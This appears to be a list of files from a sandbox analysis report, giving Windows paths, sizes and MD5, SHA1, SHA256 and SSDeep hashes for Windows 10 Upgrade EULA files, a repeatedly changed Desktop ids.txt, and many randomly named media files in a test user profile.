SSDeep: 1536:muVsKiG1to/o4A7wCG8dTmXHrQJVXkEWn/yBRQ0Una5MXQSb3S:muf/wo4A3GSmXLQwIUnaqXQSbi
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_sr-latn-cs.htm 74.53 KB MD5: 24be62e097f1373e11846987b0e6d1ad
SHA1: 9474950ad0e34af4ffe10bfb812d9d42dea724d2
SHA256: 986218f481250d0d2ca39da5d52ebd33b8ed7c59dc8e651f6d9fc27dacf102bb
SSDeep: 1536:F1wvdg6lFCs4L7jYBn3423Ks2SvsKJUzIiMc+uCFuZOpYs0D87tw0O6:F1wDlEdHY9sSv7NiX8F8OpY387XO6
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_sv-se.htm 69.50 KB MD5: 62d13b4e30495112d08a0b5153452576
SHA1: 0baf9bf0cc3ebe58701d3db5849ab52e2fc68388
SHA256: 8204c5f45a4831771440e1191c23626e12817786952fa4d90a6a1660fe0c48ce
SSDeep: 1536:sh8tynzCkmJj9qE4fnP6dBW95tNaiCp4IOB8bAOOiopUdA8o5q:sh8tynzC9qLfy0hk4kbAOOhycU
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_th-th.htm 248.95 KB MD5: 7fd0de221716b14f7e467df77078b3de
SHA1: 491fa05c3e723300ef3f70126f19842d386cb65a
SHA256: 1400b58da2824043e4fe0690cc7f64a26023eba3feeafdc899b1ed1386d86ab3
SSDeep: 6144:lGDxNLeidBLWxBCMSbcw6bVzAPavXOg4PjVAz3htlbih5xu:ML9PLuEHcbVzACvX5sE3htl+h5xu
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_tr-tr.htm 74.14 KB MD5: 4bd9e5abb9f327b129f941e535a07078
SHA1: 67f2c6765a18102a09160900bbafde044a565c9f
SHA256: 17cbda15ea31f57d15a54c5840b43bf02c0a24814b88d323a1b04e3e4beb267b
SSDeep: 1536:eu5Db8L+kRPn2vjzYL0Ca/S1g46mUucHpsI3sX0G6w+8suLJG:Lb8LFRPSjEL085qvreeiG
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_uk-ua.htm 261.23 KB MD5: 635faa02d08c9e9e97e9ebb486b2581d
SHA1: a170080ea7137de9147fb76ef80eb251dd752df3
SHA256: b6803ded15fefaff62ae2193cdc92f2ea4289e99560beb1eaf221de8d19e6e86
SSDeep: 6144:4iAx86TX7nMtoUTUHwhr75ocBv3aafvMbTHBpgz:NAVMqUoHSfBv3a3bThy
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-cn.htm 124.05 KB MD5: a6e09e4555575c4bc101e9297b5d25fc
SHA1: 2532f7be94417cffc07b6d79ffc0c9527bfc7c37
SHA256: 6675d2b505381fe9b00764ecda4a3a01c79638b68d15a225f34ea5f0aaa0fa61
SSDeep: 3072:Kf5dcfFhJo3akyKayfpykX+Vi7HF6jReQfYBH9:4q/2ByKaqpRpjwrG9
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-hk.htm 144.45 KB MD5: c36235262714f86ad3cfa37ff5f8d386
SHA1: d784b0b8a458b5f22e2ae1ca521db6c47de406da
SHA256: 06ffce707bccf0538fa06de5b39c0f5ac4bf55af25cfbc81006ffb981e504d30
SSDeep: 3072:LUR15T/fpsLfAmoNIt3M4Os83hk1BKeF6DsfslBhU2LNhWv:wR1N/CfKmfZ1BKectDhHhQ
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-tw.htm 144.45 KB MD5: b1a3e471266d0bbac90898a61883ad80
SHA1: 06c5bd4dba3ed22c926d24a701fc19a42e2413b2
SHA256: 58a65be16aa0948a0e9e9e9a6e650d8256fb678265dfd4860da21d98e8c973b0
SSDeep: 3072:eCm1z8elAEIgF73eaDLDKHcBmPTi9aRD4Nz6TrNBKBGlo7o2ZKyeMZu:eCgzweegLDK8Bmugg6TrKH7R9PZu
False
C:\Windows10Upgrade\resources\amd64\hwcompat.txt 72.17 KB MD5: e4a1a973ac4acdfdf5b2bc7f7f3bb772
SHA1: 0cf15d6819e76b9a26ed2c07a4acb19a613c8ea0
SHA256: d370e7278f112f60273cdf02747bc275d65bfdbd8d3a96e52f6bd5ed511d2d93
SSDeep: 1536:V3/zWsmqMVQkIuR1HndsDIj4UQ2gMUGNbxQyRbQ0yt38Zi70K:JmLV7IW1HndsK4U3NUGJNK34K
False
C:\Windows10Upgrade\resources\amd64\hwexclude.txt 3.02 KB MD5: 3fe86c5725a786b9d4698401e279d2cc
SHA1: 2ac869bbc6eae34bfdb2ae2f6dff45f9bbf5cf51
SHA256: 5ecde37d07b3d262fb85d2b392d535d8b9604587d2f99aacd3bcbd85c8293614
SSDeep: 96:BDcHZzT6M5rnyRfqZ3Bbf+ZQOLgPUxGMFj2M7Nvf:BDcH16MdnyQiZXLgwGyj2Mlf
False
C:\Windows10Upgrade\resources\amd64\nxquery.inf 2.22 KB MD5: 12855245f42686b91dd9e667a438aadd
SHA1: 189a61fb49fe8b756181501ae08bca36b62b364b
SHA256: bbce12c6795731d7f60ba4a5881bfe21bc9abbbcc4d4cd36fa9e74ed70deebc8
SSDeep: 48:0ZViDEHGMIjCj7aaM4Md0NwGft+s0LMmun9vHM7Nvf:ssDZQP258pEsiMmm9fM7Nvf
False
C:\Users\FD1HVy\Desktop\ids.txt 1.31 KB MD5: 25d65c221940ba29aa23e933e7d38066
SHA1: 3f244f92e8799b77385c3033ef6397628fb042d6
SHA256: 6fccae0ebb5531d53e2a39d4aa264486eb5e1db952ad2a896c6d81761f072d7a
SSDeep: 24:VmZGdHYhOZaw356poyoKw0ToZ08Ut13AFUwIavJyUpTUYdekYdF:QZkOi8w0RLVAFptxyJ
False
C:\Users\FD1HVy\Desktop\ids.txt 1.41 KB MD5: ad6b7935c20588241b4b2d59e00e036b
SHA1: 52f19a523134dd1e579423a7b7301b921a912d9e
SHA256: d330bbcf3fae36c39dd4a2bd77ea6d6abd478b00b46f3f6a142cc737d80c51b8
SSDeep: 24:VmZGdHYhOZaw356poyoKw0ToZ08Ut13AFUwIavJyUpTUYdekYdpYdaJmn:QZkOi8w0RLVAFptxyRmn
False
C:\Users\FD1HVy\Desktop\ids.txt 1.59 KB MD5: 72ae4cb854bee640298751c8f5bb73b2
SHA1: 78bfe267616ba05da81de5ab614f8ea3d2f5330d
SHA256: 111938eab3ffde97f9203c6e499e5b068d961a9e9af3fdaed111dd01779d8672
SSDeep: 24:VmZGdHYhOZaw356poyoKw0ToZ08Ut13AFUwIavJyUpTUYdekYdpYdaJmHdkT3dW7:QZkOi8w0RLVAFptxyRmI3C
False
C:\Users\FD1HVy\Desktop\ids.txt 1.82 KB MD5: e8a678dcc22e3aa4d0b59d6ddb8731c1
SHA1: 543c9f4d125122c43aa15d0f56b141710afcd161
SHA256: 4d468f1b124e05a4b00c6d6f3f1d13e3c66c0de93227200549db1391ad51f15d
SSDeep: 24:VmZGdHYhOZaw356poyoKw0ToZ08Ut13AFUwIavJyUpTUYdekYdpYdaJmHdkT3dWg:QZkOi8w0RLVAFptxyRmI3S6QM66
False
C:\Users\FD1HVy\Desktop\ids.txt 2.00 KB MD5: 8001bfbbc463902b575326ac8a6afc60
SHA1: abff6943519e15cb2fdd8198ad7baf30c26ba1fd
SHA256: 812e3c991831673921cd78f021c0e89eb8c7b7f463eaaa2d7710d0214c81812e
SSDeep: 24:VmZGdHYhOZaw356poyoKw0ToZ08Ut13AFUwIavJyUpTUYdekYdpYdaJmHdkT3dWx:QZkOi8w0RLVAFptxyRmI3S6QM666b
False
C:\Users\FD1HVy\Desktop\ids.txt 2.17 KB MD5: 38c358dc06d7f6fc23c273f53515b407
SHA1: da265ac1ac2f8880900de8edf5ea81e5ebb94d25
SHA256: 7e80057fe62d1f19d7eecc09ddca7ae39a6ce8f866ae2c77272961f051740ebd
SSDeep: 24:VmZGdHYhOZaw356poyoKw0ToZ08Ut13AFUwIavJyUpTUYdekYdpYdaJmHdkT3dWn:QZkOi8w0RLVAFptxyRmI3S6QM666jB
False
C:\Users\FD1HVy\Videos\54be.flv 35.00 KB MD5: f31a5f07d189bc178cebbef699ec8462
SHA1: d07c13668df0ab1614287a00d27f788e19f35fac
SHA256: d5252484b84ae73754808ec524a9713f769467198fc8dab6a09b056c473a8b26
SSDeep: 768:08HSaX416vgkIunP+WVgzSTyX2VSwJkVKhYKn+sLmJFh7tttgqt:Jx4cvgVlWVgzXiTkowsKJFJj
False
C:\Users\FD1HVy\Videos\tKr\W681BwserRy_0.avi 80.30 KB MD5: d000bf70b783921ddf815a82b1a66ab8
SHA1: 6021260eae78c66c7bd983f159aa5c0e917a9f8d
SHA256: e3328aff0fb0aeb9f648d4ecfb4502ebea0b131c9722fc265ca7c0a0e49fdc11
SSDeep: 1536:FvAZZXeTCnoq7W6YdzRWZqRMWaLe3A9nS7yMfK+o5W7PiS:FvAZZXeMn6TdzkajfYYiS
False
C:\Users\FD1HVy\Videos\Mr9We2Kb5L1oUgPF84r\l0I0AT.swf 100.23 KB MD5: 6eb7ffddafe900c58e0dae2e63610a54
SHA1: 80b3f200c5847511b9bd48bed6be0b7f39e5e30a
SHA256: c4fbd9bff33479cd285ac767e969961ba63f2747c06cc726f6be6713318e48e9
SSDeep: 1536:+TnhXTlXlU2C4OaEYf1AneT/MvkrPolu2HImN0BDfptFW1NmqJYjmTpCsiwgiC6M:unJxKr4UQj/MKPCu2oN/W1NoC+wgMgbP
False
C:\Users\FD1HVy\Videos\Mr9We2Kb5L1oUgPF84r\_cqQP-g.mkv 90.12 KB MD5: f843b6adcf221a7228edb7b197111002
SHA1: 625905576fc0415dc9537593c1d62b32de43067a
SHA256: d303da25b267baebdffd9348babc4ab6050f45dee8d38eee819c41662ab7a680
SSDeep: 1536:TfNoHTEE2i3xetQ/Im85pJP7A0xX1I0xRRlJmEdQMw/u3U7bBWWe/ndUW5/NsDMH:TYTEE2mIm83JDA0xFblJBQMw/h7+NsMH
False
C:\Users\FD1HVy\Videos\kyLFwyj3y_- AKUbu7HT\JPgmUVeD.mp4 40.70 KB MD5: ef749be737833c6b1f8ccba41d39681a
SHA1: a61f5961a2891c7ece7b5e170c82953036be4cbe
SHA256: 869ebab2f64ae42d4d2475a33a197a80e316e595d5ae521885542e5f91978cfb
SSDeep: 768:rOa6qnlsY0rXHDEjWvnLikJzKLTTWoplEg0CnqWAzr6:rYqlstzjEjKLiZpuCqWAn6
False
C:\Users\FD1HVy\Videos\kyLFwyj3y_- AKUbu7HT\Ui7VnDgLzhug.flv 12.25 KB MD5: c0acce423710a09ff1baa6b48f89e014
SHA1: c1dcc23f9bc9dcf6adfc839c9742261d9e732e9c
SHA256: ba88bd3fc54ad1eef38e27b2a3424ed12fed056595798c36450baca2824a9610
SSDeep: 384:8AJJC9JuGMnTrepF990ZF0hgN+iAFHGFVBv3+:HJY9JuBm39WF0aNMGI
False
C:\Users\FD1HVy\Videos\kyLFwyj3y_- AKUbu7HT\VuG piDpw9ji.mkv 67.25 KB MD5: b709cd86f91e90a7e9de07f569b8b6cf
SHA1: 4af528239ad9b2419c28ceea55e2f52bc798ed23
SHA256: 59da137360d6d60a006a9f4494e353d4089c6c24f0c143482f1e595ef9986fee
SSDeep: 1536:qqiDEtppiq5RcauxWmFUPg7dnZMWrNW8sEnD4xIW15C:qqiDE+qd4Wx+XrNW8sqD4xIk5C
False
C:\Users\FD1HVy\Videos\kyLFwyj3y_- AKUbu7HT\znnVwfJyK03KyEgu5yk.flv 84.27 KB MD5: 0eac227c14aead7d1c71ce145e8c8909
SHA1: cc45139c67c88c95411f4f6548ca40b3be8eec94
SHA256: f15a59aed7cf9e06828862056a6d0060826598de98584371f1a2e14af95c3b9a
SSDeep: 1536:aGKeI92GPaOwD9iJ+QFzCP1m8E/dMuU7vBHfCpC/GvumTE8ChqXar7OS:aGKeI92c/wU7mO/SV7pH//4umTEHkS
False
C:\Users\FD1HVy\Videos\Kagr0\G50GPz.flv 95.14 KB MD5: b37d26f0692e6226ac10eeeb2ee92945
SHA1: 8a235594daedbb5c70470e8b09b01b44e6dd3529
SHA256: 481a230a82407276c74443b722287cb2814839efffabc22c2ab5d624a8e8b246
SSDeep: 1536:PuRclt7aLhrkZDToDr8HdglT0JdDCFH3oB8xEoDUFzSX+GC0Y828/Dz89KWsOD9Y:Mmt7PBQsg+6FHOsyFzSuGC0Y+Dz8Qb0i
False
C:\Users\FD1HVy\Videos\Kagr0\tRYgRmfMiyo_fA kpl4-.flv 33.69 KB MD5: 8c1a345c3e50922964db21287d1e2499
SHA1: 93fe96d872e46be8600974587ff53daed4c5b9c3
SHA256: 0399482cd3582b3514fc70ce2b2d27eecb1c1fc9b4dc29c1494859e7f638cf1a
SSDeep: 768:bXGiGT9n7uPSYlSVD8NboRoGO5eBb1+G9lfAB2Arp0m2AAyQdzyY:b2iEF7AIVGER3O5E5+S9AB2O6AXYzyY
False
C:\Users\FD1HVy\Videos\IGecK\Dl_2E.mp4 83.97 KB MD5: 981baffca8b068fca7ad634ce31b1aa4
SHA1: c1cbc895089c2170abf66f985619ddc2ff3820a0
SHA256: 51151ae940b4ee2f9f877c67c159c3f2e80f2ee7f071483edaa4d59b50f81029
SSDeep: 1536:PqQk3eeqkJj1kx0V6M0dj84LSpXOFdcBt63lSMXwcyzaHPmp3cT1liDG26d:PGuevJd6m4wXO8FMX1PvCcFF
False
C:\Users\FD1HVy\Videos\IGecK\tPmIDjSq0JZ6KPmq.mp4 74.12 KB MD5: 535d4a416dc13ee2aa0dd4172ac63217
SHA1: 98b299a312b0ef87f64b404277ee226ea0b78556
SHA256: 5044adc91c6d7744fdb7a80ff4c01e436afb3fb9a6b3bb33e24fa4f11785cdd4
SSDeep: 1536:hwRWPWPlsxPpVGCnJZ/WqEnaV3+Dv/lQxh7acXymh+i53PR5dUcEXlIHf:hw4WGfVrnJknguDv/la+mhndpKX+Hf
False
C:\Users\FD1HVy\Videos\ahcaYgdd_uS\dIBFcA.flv 84.50 KB MD5: 0fca564fad16b30551674540d7d7a2c2
SHA1: 100d32374f7bbe9952affed382fb15f09b6d577a
SHA256: 75f400540fa724c9c1617682b9741e5eb616f81a0a63b8a69967a805889c47e4
SSDeep: 1536:1eqBRonO4Q+FsxnpPRKFGp92eegdbpafWfHIK0POGhM1wPIYIzF:gnOTfxnRkFGfegdbpFILOGC1wsB
False
C:\Users\FD1HVy\Videos\ahcaYgdd_uS\qIBn Mru7Ws.mkv 13.61 KB MD5: c65ab7aa04c89453bf076a3b151879ae
SHA1: 5ca42cf62414b21f4843f0b497b57f99e042597f
SHA256: b8dadc432ca0465728eb593ab9d6e93154cb2e947b2a10b0bac43bdf6b451c03
SSDeep: 384:F2527x0MGQRWXDKSLvKwORfi8hjMNEXEyd/chPBtN:8I0MGQODKSzYfLV/dkhBtN
False
C:\Users\FD1HVy\Searches\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms 1.59 KB MD5: 5746004b515a5cca1fc07c8188e65b75
SHA1: a995dd198f0422264bacf978c6e03dd1543774c0
SHA256: 76ee50893c4e45ea76d3aac47ff78603a0d2639490d97e56ac999c5a05615c6a
SSDeep: 24:cElKWFj/u7N7Eing1cf2vd9HtJiaGhCdkeA9dxVZVZMLUmOt3W9+93LnszrS8GPP:0c/igH/HoKaxVZVZMLHM7Nvf
False
C:\Users\FD1HVy\Pictures\0E0w6TbFOV.gif 45.09 KB MD5: 244ed5ffab35dbe6b98d30245d18450a
SHA1: 802fbc1a8f7931d4df202521076f27c3a2b11004
SHA256: 299f617b86bd4db7a0e513fff20b2dea4beec9bf66042a3716f7485ec33ee7a1
SSDeep: 768:uYS36G+dkn1tU5L7Lmpi3ySAzScWluQfa17t87tRqSKPO5T8HtZokVWE:VTm1tePC43Iuc76a1Z8hjKPGTgZ9T
False
C:\Users\FD1HVy\Pictures\0Y8YAfgHZ37VsZ3R.bmp 61.67 KB MD5: 7a3141e18a24ef641aa5612888f6b0c9
SHA1: 227971abd535e24a91c4f4bfad7c31f5450c3ee3
SHA256: 11e9f3211d1b733c5c2b39ac6db2a27f50c4078d5258946e8e46299bf18edf0d
SSDeep: 768:NOjIMYAitHI4qqPFzfHDuXYam7x5o31kTEClkv/4TG+vpugUH57O3HzklvpQ5bJ9:Nxfo4rNfHSejW6hKvQjugUcp5duSMC
False
C:\Users\FD1HVy\Pictures\1XaE_kKDx5.gif 52.83 KB MD5: 6c2c1294b750f755267b6eaa81ab6ed8
SHA1: b2f75acaac04d3d8241ccd0f4061ca23a24f2004
SHA256: a52faf0df83a13d0f2ce84430f81df945514c9fe0f974fec13881d08d55ffb23
SSDeep: 1536:MGb7DfoUxDcQVDclMBxpN0Oqy7N/DJFIgji5wU3Qh:MK3OAclyxv0kxHjtU0
False
C:\Users\FD1HVy\Pictures\5e7Wc.bmp 93.83 KB MD5: fe5efebb347ea5d47839bc13233859c5
SHA1: 3e128ec93e60dade8c4b6a91a47be2a1fdf785d1
SHA256: c0d535e0de061e101aad5a26a2a5daf51195085f8c0ad858121aa2b6a180c316
SSDeep: 1536:9+Mu8gRCvmaBhqkMkTHzjotc/O7vAFBzsBcmOazpWx33h0sWSQX13k:g/8gRCvVBhqkvkWm8gBfDSQX13k
False
C:\Users\FD1HVy\Pictures\5NeoW1fKEkQU.jpg 45.86 KB MD5: 4a7b096d240300df7a99ed1367464882
SHA1: 883171801a4890415f8f5844353f3a933ccf172d
SHA256: cf36213217f319ba7913fba94bdb3306529081bb423ad7f3d1c4f1db6bc4bc65
SSDeep: 768:1U0lbSU1vQtea1vvcalyygeaIhm2jz8cLD3WftgR2/1LjYfoxQhNUF1dFhx:BlvKYa1vkE9h5z8WDGf2iigx2NULn
False
C:\Users\FD1HVy\Pictures\7ZNXracFupquDdAVyh.png 78.45 KB MD5: 6c35b068d01dc82542963c0635273d04
SHA1: 0cd4bee445212af0825176cf85e3dca67f2c4b38
SHA256: eeb757525bdd95ca1a974a4795f4ba1c2a053c7f841bd2df26ee6193fd1d947c
SSDeep: 1536:XX4l+1SvQ4Ra4KtZ1+XW8cS5I0q6uRTVfsA9krIwfLud1q1Lmwh7ZC18j3Y4n1su:Yl6URktZuWLSyjpALgKHS18DKEyFDNg
False
C:\Users\FD1HVy\Pictures\AMY25182fq.jpg 9.09 KB MD5: aff886262e7194cff528d16ec8eb1aaf
SHA1: 1ec96364db88130757dcc8e189bd0fbcd7ac09cf
SHA256: 104746bb0d9f5b3301974477bdf2bc442ddaeddaa88ad3acd54c918be53a2687
SSDeep: 192:Pmc9jzirHY1bNf9sTEpCCic78q7lsPf7JTJaQ6FoEE5IuN3P/KyEPQ7jMlf:59jzf9zFvten7Jtk/ElRJ+uY
False
C:\Users\FD1HVy\Pictures\Aq_JMuY.gif 71.12 KB MD5: c8574c3043b8c6b754486cd797159b83
SHA1: 5fea36e0aba45a56473376c0ece755212387b31f
SHA256: cd0f7bfa47fcef89c547b138889e8baae6b5c16855f74de2f414d181372b0b1d
SSDeep: 1536:a20zwjDcDp6uFLaqCKm8jBQpYE5z/e+VU4MKwT8vdLCsSScpDhd:T0z+cDp6KLrZNBQpPRVU4MKwT8v1tct
False
C:\Users\FD1HVy\Pictures\EdaNrSsz8PG4d9S.png 93.80 KB MD5: 478e38647c50f0cb8a2bd246d5b43a7b
SHA1: a12ed66f280e44329969dc13ae2bbaef3306e48f
SHA256: 4d311610f5897ae04c14949f0c8f4ffce3d94a4d0c62bcb092289a14be4aad97
SSDeep: 1536:IzyiCE/L8efhGmEJi/RHp5BS7StnIxPzK2884mUtULidxLA62R3SyZ/MXdLYZ:9oZ3EqHpy7Ip2z4nvzLA6+XKlG
False
C:\Users\FD1HVy\Pictures\EsY7H_GddWmcCw.bmp 5.48 KB MD5: a5ccb63c7e2dd09a477e651bdad5ee76
SHA1: 674a38e45eeb1f1aec487edca3855d3827952c25
SHA256: 5415190d5ee26c94e3c5859929c00b5af77f8fbc3c7292739efca5eb4674d6af
SSDeep: 96:43hEprgEe5nui5p+PEKnyN9CWgtTX8FC6TpavqPGXipx4vpWoyMXLV3Tc/0Q1Jl8:kqKnui54TnS9CWgtri9lTSgM53TcB1MF
False
C:\Users\FD1HVy\Pictures\gjrmcE0fc5l.png 13.28 KB MD5: 6b07565d0c5adeb7ac9c739727663194
SHA1: 374ed90ba8d339d8d998da1d761f8b3aceda6cfb
SHA256: ded1b946e941386c7e23808c550c16f0483a886e15ad7b82cd7051e359170a99
SSDeep: 384:Y3OoJcYr/j8+lwEHTysDTkE9mKlSyj+LS:Y3FcgJlwEzysMGJD+S
False
C:\Users\FD1HVy\Pictures\HQIARmS0E7.jpg 46.98 KB MD5: f08b7da7590459774dc522331288c5a7
SHA1: 0c0346bbb8cb04812f5ba7fdef341f4ae4e2874b
SHA256: c0d8f0bc5e9a074de10ac1618f53a6535bcf7c9f0cf463f95cc61ffe533d4d67
SSDeep: 768:SfVhLKHXQwU+Nw3Rj7cBARk2a+PjUauBSRSxblWsTZ1ylAGOyn8IR06:OVhW9Nw3RPyIkiUaA/lWWKAyXR06
False
C:\Users\FD1HVy\Pictures\iOQr98FaIzfNvYuwjB9.jpg 26.36 KB MD5: b86ff5e9feaa36d85c49103f91a8ecb2
SHA1: 4a35b42cc5e33a6a0be252a0c7d4f90b69aa6a6e
SHA256: 948d463bc707dbab304402d8b1008c599107300fc43494548bff793b6f5bd213
SSDeep: 768:IO2/f7UoNRZ/WoNtj2Woqxj+JP8N/Y4fDa2c:Z+woNRZuojPxUP8i47a2c
False
C:\Users\FD1HVy\Pictures\jykDBuh.gif 42.66 KB MD5: e593914d540e378ded50280d1d2af977
SHA1: 94ce2f402efdeaece35761cc17e7ab7be11b8c16
SHA256: ed1cb584a578c9d95463a28bb3056511e0f0b1228612cec298fa36b1841d460a
SSDeep: 768:7yeYpUYKrze337GNiNRyP/+iKpzaICEgYAONZOYcqahiCU2/xUQ1Swh:71YGMKNi2/4lzCD9ONyqYUoxUQDh
False
C:\Users\FD1HVy\Pictures\mNtSm.gif 5.41 KB MD5: 02fd332125a4787d0d50e21836e92ba2
SHA1: f0da6ea646b788dad386daca4ffc07719852f6eb
SHA256: 41e3ef321f830a8637c9866a774e833beb7fff350731b31f944db24b652c35b7
SSDeep: 96:wB6vxCzMX1fzqaR/ckBE++ACUasC8CFy9zdfX/M7Nvf:5ZPb/x+kEg9zdfvMlf
False
C:\Users\FD1HVy\Pictures\oNuU.bmp 74.53 KB MD5: fbec74c4522197373f53e3a28e04cb9e
SHA1: 4fb8947b126cccbafecbf83b9c0a1f813d19ab1a
SHA256: 1394c47ce4ee58dce37193d49f8bbf3827a20517663c5fa097818e5b1d08c5cf
SSDeep: 1536:MiFzZ+DLh2wJDVVuOUZYy1YF6iUDUKA+YW4hco79imQIPIE:1zZ4MwJJFsfYF6imU2YW5o7UIT
False
C:\Users\FD1HVy\Pictures\oOFV7u.gif 5.50 KB MD5: 22e368f2d31dd6c8dc8617f63876c135
SHA1: f64e80d0c2253dbb14a468b8dafe8a571fed79fb
SHA256: f8d839cfbf3778fe0d054b376f8d5e54b95c5906786711ac2ea0226ecdfcc26d
SSDeep: 96:yu1da7DAtqn7B5prx4VWfHDWEjhooDJxY3W9C1UvNBL7faJ2XZeTONfldM7Nvf:Z1d40tqn7B5p9v5ootqm9K+Nhf88kOVY
False
C:\Users\FD1HVy\Pictures\PJWPk3ZGq4tLQ1TaA.bmp 62.31 KB MD5: 0ea1aa01226a84141b538cf3184a2d08
SHA1: 45741642caf253f793eb265e37c84b3c3e6b19a1
SHA256: e20647fcc4291d9dbc24addc3fcb2865a006608448449ebaefb3a41044705673
SSDeep: 1536:OSYfVU6LKssVjV74If+GGDv7DFSxHGI/1OdnZYFTwHB:pYKsid+GGoxmItsnZ2kh
False
C:\Users\FD1HVy\Pictures\QNXsOD0CxQccs.jpg 49.28 KB MD5: 047142dda9dafbcd7cb03024bd9afea1
SHA1: 25cbd2563d4b3784deaff6f963bbc684bbba6db6
SHA256: be8af4710fe470acf7accfd2ead1c44fcaf27a30719f30b27b6a26a56f354caf
SSDeep: 1536:Yjdc/XWVfi0sutKaUSRemZl0xPa/ZuXzughcwc472y:m4ei0sutfV3+Pa/ZuVhca
False
C:\Users\FD1HVy\Pictures\qwNICVapgEY_croJBzk.bmp 27.94 KB MD5: 6b608c7a03d9478b338bb3b7b6cc4482
SHA1: c4d62574034e6b7ce18e1060ee245ea76ce08cf6
SHA256: 49cde5d999a6527f7851fd549a7411ccf31cc6f67cb697827a0d8969eacb8ccb
SSDeep: 768:4YfRomjneUC9mr5cpi523Vvkw457G9A5e:4goiJr5cpACkwh
False
C:\Users\FD1HVy\Pictures\S 0Jzd8n.gif 22.95 KB MD5: 0d519e44127a8b979f6fa2002b953a78
SHA1: ef64821300fdd4c6250ed21a425549a675a6199a
SHA256: 8c95c7d98b63d8d83f78dc69e3e108184f573409b993b7326ef699cf1e6428d3
SSDeep: 384:t1c8xHYlrlSLi7GKo8iWHUsV0SOdLTENvN7q+UtyYkRcCwP5SYHHl5r+DlnnRyjG:o8xHYtlQi7GvxW09NE3cyYkRhwP5/HHw
False
C:\Users\FD1HVy\Pictures\SEPWWo1.bmp 36.50 KB MD5: c1e33ecf632a1e98519fb0250e64533d
SHA1: 14865682ed7d067ac97db8b8650c67da552d2bc0
SHA256: 08d8f4d6d5bfeed5e7d6c92e13f414bc2b53f51b64131178a39e305a10176045
SSDeep: 768:VWoBIGY3DTmMNFIzg89Swjg508rL6Pb44pzm9G2Gi+pI7D1rjrw:zOHNCzg8swjh8rGPpp69fGnpirj0
False
C:\Users\FD1HVy\Pictures\udmWUxt.gif 74.52 KB MD5: 28459b7c0e35037e3c5ea559dab225f2
SHA1: fc75a934ce63054337f34fd2ff580ddde5848d35
SHA256: fb8103aadf4bba93378521a6e783093ceab93a1d2c581585e603ac0330b0bf6e
SSDeep: 1536:mHqKoZugae9Gu7t5CIh6xB7ndvVR+Cx5MM/MpM79TwKtEB:keugae957fCIh6DbHR+CWM7lwWEB
False
C:\Users\FD1HVy\Pictures\v9mOV_kgH.gif 68.17 KB MD5: 2f80bb531e0e01ecd614c7bc202bc6df
SHA1: 14f4c256c343246198268814f5540f0c2f98de1b
SHA256: 1e26dda56bf5df0e1555651d48242a480ac02fc6282c121f22a81e98766877ec
SSDeep: 1536:LhIv/HdxI6xjqcrUUA8CRMGNdBtpFI/CZN6Ii7:LqHdvxphA8oNW4vi7
False
C:\Users\FD1HVy\Pictures\vGoIqs1-6HE.jpg 32.59 KB MD5: 805ed208dfaa085c1fe5a3ea43b392e4
SHA1: 197392bedfde8e3a534868b215b61cef87e4ccdb
SHA256: b678b1ccbb1232d11cfad527748c929a2fccd6258d0a22fa1cf18e05bbab40bf
SSDeep: 768:7Tp29a7e82sjiyNGZVxqvU443dt3wjA+iG/JTPF5Sx4k4t5V5iBpY:5gGV5qvqvU/3b3wE+iMP+UvV5c2
False
C:\Users\FD1HVy\Pictures\VkOhDAWokkfYOk9.gif 50.06 KB MD5: 0b944c0fcfabed218a519427b177a968
SHA1: 7009dd50f408c46559dc72a5a3ba9576df81c70f
SHA256: 495cada236cd629639acd239a066f41eb90227e260f45534a948fabfe6b24f8c
SSDeep: 1536:tA80qjSPQqXf5pJ+6FXbUP+icE6WTpkmA+:tAx2GQM5po+2+icpWNkmA+
False
C:\Users\FD1HVy\Pictures\ykv5 pVyi.bmp 41.16 KB MD5: 1f82fb69250d2a53b1b8d9f95025b1c3
SHA1: 6a41808ed0f25ff077c6b2302f9709bef35cf2d8
SHA256: ca1ebc9c12c99c34b51b52632852fca0ff4206c72f52cee09f934198269ac23e
SSDeep: 768:2423ZHp0AqJpNU6uXMLBnsaG9+3XmpDRqMtlSBRP5YsrtvVvDIiw:VSZWJpa6nt3XMRqMiBF5lrfEiw
False
C:\Users\FD1HVy\Pictures\yOcAT3Ep59x.jpg 44.34 KB MD5: a39cc7d71bae66130364764a4726383b
SHA1: 9c7da434f77a13d5914ae517f8dd7e66088c259d
SHA256: 6a05233b20a0103169bfb9ba331e74687a9e1a477d6fc154d554545bf3b4f858
SSDeep: 768:nDZnwK/Fxdigjd1V8SFev73+gv3KCjF+Bf77lU48CzGdDzABk8QfiA6ipaCxT8ic:DZwMxcgjdDXezrv6SFkiZABZQd6iJxTq
False
C:\Users\FD1HVy\Music\7h4-5A5wS wr.m4a 100.42 KB MD5: 114c48da0caf1ae2ba41d6cfeedbd6cf
SHA1: 548de9897f50f07469e51a13509aff521f4dfa93
SHA256: 91fb0fa30c32b7fc04c52239533097462164d3f9cdef832bf498be41929cc102
SSDeep: 3072:JF8/3n21ma2/mXpOKE5QGfLkuxLYT/28eMSUJn:Ju/3n21mdCQKEym5sRn
False
C:\Users\FD1HVy\Music\i6PnD5hZJ2yN.mp3 93.77 KB MD5: fd5cc0061cc75297b8cfdfaa2c113507
SHA1: 20d16bff336425b3134cf95a4b3da774fcd996e0
SHA256: 27d6395c18f821447cd256c4ac1dcfa3b51d35d8ba9d24078fe45b3be7c36b7d
SSDeep: 1536:8cz4aIQ+s30ruhsO+Ap1SLzSypdkNuKwV85weuTwfFA9k6NcKYfqIeqcPR:8Ha7+seuyap1wdkNnwwweuUJ0KZop
False
C:\Users\FD1HVy\Music\Ps7z1Y\hBfw7IT.m4a 38.48 KB MD5: c97916253f5d6de43f0920c8a1ce033b
SHA1: acbb0ad4d1c2fd5ba4fc0424498fc53b2e1ace06
SHA256: 0ab0f45b723bad6ba517fd204d0b800862e7de61a36366aecd32a78c9e578402
SSDeep: 768:O6BlRokqxBiDKcaysRFVvX0dc/bxmNRoodOevhAHxd8p7vqqi/V:dGtTiJaNvku/bxmsod9AQpjqlV
False
